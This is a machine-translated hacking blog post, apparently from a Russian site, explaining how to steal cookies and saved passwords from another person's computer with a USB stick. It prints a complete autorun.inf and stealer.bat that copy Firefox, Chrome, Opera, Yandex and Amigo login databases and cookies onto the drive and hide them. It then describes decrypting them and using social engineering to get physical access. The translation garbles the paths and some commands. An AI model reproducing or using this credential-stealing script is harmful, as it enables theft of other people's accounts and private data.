RuCore.NET – English Version

How to steal other people’s Cookies on the stick?





How to steal other people’s Cookies on the stick?

Cookies — encrypted text documents that store basic information about the user who uses the browser. This information includes usage statistics browser, personal settings, stored logins and passwords and more.



Hacking cookies is theft (or “theft”) session of the visitor of a web resource. Locked the information becomes available not only to the sender and the recipient, but a third party — the person who carried out the interception.

How to do it

On the drive create 2 text files. The first called “autorun.inf” and the second “stealer.bat” *.bat — an executable file extension. Ie it can be used as a program*

In the first, append the following lines:

[AutoRun]

Open=”stealer.bat”

The first file is responsible for startup Stiller.

Second — the Stiller. It should fill these lines:

@echo off 
md %~d0Mozilla 
md %~d0pera 
md %~d0Google 
md %~d0Yandex 
md %~d0Amigo
CD/D %APPDATA%OperaOpera 
cls
copy /y wand.dat %~d0Opera 
copy /y cookies.dat %~d0Opera
cd %AppData%MozillaFirefoxProfiles*.default
copy /y cookies.sqlite %~d0Mozilla
copy /y key3.db %~d0Mozilla
copy /y signons.sqlite %~d0Mozilla
copy /y %AppData%MozillaFirefoxProfiles*.default %~d0Mozilla
cd %localappdata%GoogleChromeUser DataDefault
cls
copy /y "%localappdata%GoogleChromeUser DataDefaultLogin Data" "%~d0Google"
cd %localappdata%YandexYandexBrowserUser DataDefault
copy /y "%localappdata%YandexYandexBrowserUser DataDefaultLogin Data" "%~d0Yandex" 
cd %localappdata%AmigoUser DataDefault
copy /y "%localappdata%AmigoUser DataDefaultLogin Data" "%~d0Amigo" 
cls
ATTRIB -R -A -S -H 
attrib +h %~d0Mozilla 
attrib +h %~d0Opera 
attrib +h %~d0Google 
attrib +h %~d0Yandex 
attrib +h %~d0Amigo 
attrib +h %~d0search.bat 
attrib +h %~d0new 
attrib +h %~d0autorun.inf 
del: autorun.inf?

Then “hide” the resulting files. Their cookies on YOUR computer removed, or throw the stick. And in their place the copied received.

Now download WebBrowserPassView. You can use a portable version. No need to press anything in this program: it loads and decrypts the cookies from your browser. Don’t forget to replace your files have been received!

In Windows 10 (and 8) our autorun doesn’t work, there is the possibility of a common disabled. So you’ll have to come up with a way to access the computer and handles to run the file stealer.bat, since the process takes very little time, and come up with an excuse to sit down for a moment at someone else’s computer, many do not mind.

If suddenly who does not know where are stored the cookies, here’s a hint:

Google Chrome:

C:UsersПользовательAppDataLocalGoogleChromeUser DataDefault (or Profile 1)file “Cookies” without extension

Opera:

C:UsersПользовательAppDataRoamingOpera SoftwareOpera Stablefile “Cookies”

Mozilla Firefox:

C:UsersПользовательAppDataRoamingMozillaFirefoxProfilesqx1fqa6b.Default User file “cookies.sqlite”

Internet Explorer 11:

C:UsersПользовательAppDataLocalMicrosoftWindowsINetCookies

C:UsersПользовательAppDataRoamingMicrosoftWindowsCookies

In addition

Storing credentials in cookies is not very safe, but at the same time the most familiar and intuitive way for most inexperienced users. Like most, I use almost all the basic options for storing credentials websites:

  • Cookies the number of secondary sites that are not related directly to my identity.
  • Password managers of browsers where I need synchronization between multiple devices, including cross-platform.
  • A local password Manager KeePass under the long master password for the most important credentials, if compromised, can cause a blow to my reputation or endanger visitors to my sites.
  • Authentication through social networksand lately prefer this method.

Since the purpose of this post is not stealing others ‘ mailboxes, logins accounts and other data or gain access to them, the story will end. But with the help of special programs and social engineering can replace your cookies to strangers and to access others ‘ personal data. In General, if the attacker will illuminate the purpose, he will find the use of the information received.

Now that you know how can steal your passwords and logins. Be careful and don’t let their computer with other people.

Source: https://hacker-basement.ru/


17 Views



Spelling error report

The following text will be sent to our editors: